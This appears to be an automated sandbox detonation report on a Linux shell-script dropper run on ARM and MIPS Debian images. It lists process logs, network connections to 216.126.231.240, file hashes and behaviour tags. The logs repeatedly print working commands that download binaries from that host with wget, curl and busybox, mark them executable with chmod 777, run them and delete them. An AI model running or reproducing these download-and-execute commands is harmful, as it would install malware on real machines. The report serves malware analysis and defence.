/tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR

[./05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]

/bin/rm

[rm 05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]

/usr/bin/wget

[wget http://216.126.231.240/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]

/bin/chmod

[chmod 777 jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]

/tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5

[./jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]

/bin/rm

[rm jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]

/usr/bin/wget

[wget http://216.126.231.240/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]

/bin/chmod

[chmod 777 KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]

/tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB

[./KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]

/bin/rm

[rm KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]

/usr/bin/wget

[wget http://216.126.231.240/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]

/bin/chmod

[chmod 777 qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]

/tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O

[./qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]

/bin/rm

[rm qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]

/usr/bin/wget

[wget http://216.126.231.240/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]

/bin/chmod

[chmod 777 pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]

/tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5

[./pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]

/bin/rm

[rm pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]

/usr/bin/wget

[wget http://216.126.231.240/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]

/bin/chmod

[chmod 777 nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]

/tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey

[./nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]

/bin/rm

[rm nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]

/usr/bin/wget

[wget http://216.126.231.240/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]

/bin/chmod

[chmod 777 F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]

/tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4

[./F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]

/bin/rm

[rm F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]

/usr/bin/wget

[wget http://216.126.231.240/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]

/bin/chmod

[chmod 777 BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]

/tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat

[./BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]

/bin/rm

[rm BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]

/usr/bin/wget

[wget http://216.126.231.240/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/bin/chmod

[chmod 777 wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy

[./wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/bin/rm

[rm wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp
N/A 224.0.0.251:5353 udp
GB 185.125.188.61:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.1.91:443 tcp
US 151.101.1.91:443 tcp
US 216.126.231.240:80 216.126.231.240 tcp
GB 89.187.167.3:443 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-24 01:07

Reported

2024-11-24 01:10

Platform

debian9-armhf-20240611-en

Max time kernel

16s

Max time network

43s

Command Line

[/tmp/d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy N/A
N/A /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 N/A
N/A /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat N/A
N/A /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c N/A
N/A /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E N/A
N/A /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y N/A
N/A /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y /usr/bin/curl N/A
File opened for modification /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT /usr/bin/curl N/A
File opened for modification /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy /usr/bin/curl N/A
File opened for modification /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 /usr/bin/curl N/A
File opened for modification /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat /usr/bin/curl N/A
File opened for modification /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c /usr/bin/curl N/A
File opened for modification /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E /usr/bin/curl N/A

Processes

/tmp/d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh

[/tmp/d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/bin/chmod

[chmod 777 wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy

[./wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/bin/rm

[rm wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/usr/bin/wget

[wget http://216.126.231.240/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]

/bin/chmod

[chmod 777 F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]

/tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4

[./F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]

/bin/rm

[rm F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]

/usr/bin/wget

[wget http://216.126.231.240/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]

/bin/chmod

[chmod 777 BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]

/tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat

[./BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]

/bin/rm

[rm BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]

/usr/bin/wget

[wget http://216.126.231.240/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]

/bin/chmod

[chmod 777 vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]

/tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c

[./vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]

/bin/rm

[rm vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]

/usr/bin/wget

[wget http://216.126.231.240/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]

/bin/chmod

[chmod 777 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]

/tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E

[./93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]

/bin/rm

[rm 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]

/usr/bin/wget

[wget http://216.126.231.240/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]

/bin/chmod

[chmod 777 iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]

/tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y

[./iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]

/bin/rm

[rm iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]

/usr/bin/wget

[wget http://216.126.231.240/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT]

/bin/chmod

[chmod 777 Lo46YywIia327erXTugKxcchWtLwMJPGmT]

/tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT

[./Lo46YywIia327erXTugKxcchWtLwMJPGmT]

/bin/rm

[rm Lo46YywIia327erXTugKxcchWtLwMJPGmT]

/usr/bin/wget

[wget http://216.126.231.240/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-24 01:07

Reported

2024-11-24 01:09

Platform

debian9-mipsbe-20240611-en

Max time kernel

94s

Max time network

100s

Command Line

[/tmp/d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy N/A
N/A /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 N/A
N/A /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat N/A
N/A /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c N/A
N/A /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E N/A
N/A /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y N/A
N/A /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT N/A
N/A /tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 /tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 N/A
N/A /tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB /tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB N/A
N/A /tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR /tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR N/A
N/A /tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 /tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 N/A
N/A /tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey /tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey N/A
N/A /tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O /tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O N/A
N/A /tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5 /tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5 N/A
N/A /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E N/A
N/A /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y N/A
N/A /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT N/A
N/A /tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 /tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 N/A
N/A /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c N/A
N/A /tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR /tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR N/A
N/A /tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 /tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 N/A
N/A /tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB /tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB N/A
N/A /tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O /tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O N/A
N/A /tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5 /tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5 N/A
N/A /tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey /tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey N/A
N/A /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 N/A
N/A /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat N/A
N/A /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E /usr/bin/curl N/A
File opened for modification /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT /usr/bin/curl N/A
File opened for modification /tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 /usr/bin/curl N/A
File opened for modification /tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB /usr/bin/curl N/A
File opened for modification /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 /usr/bin/curl N/A
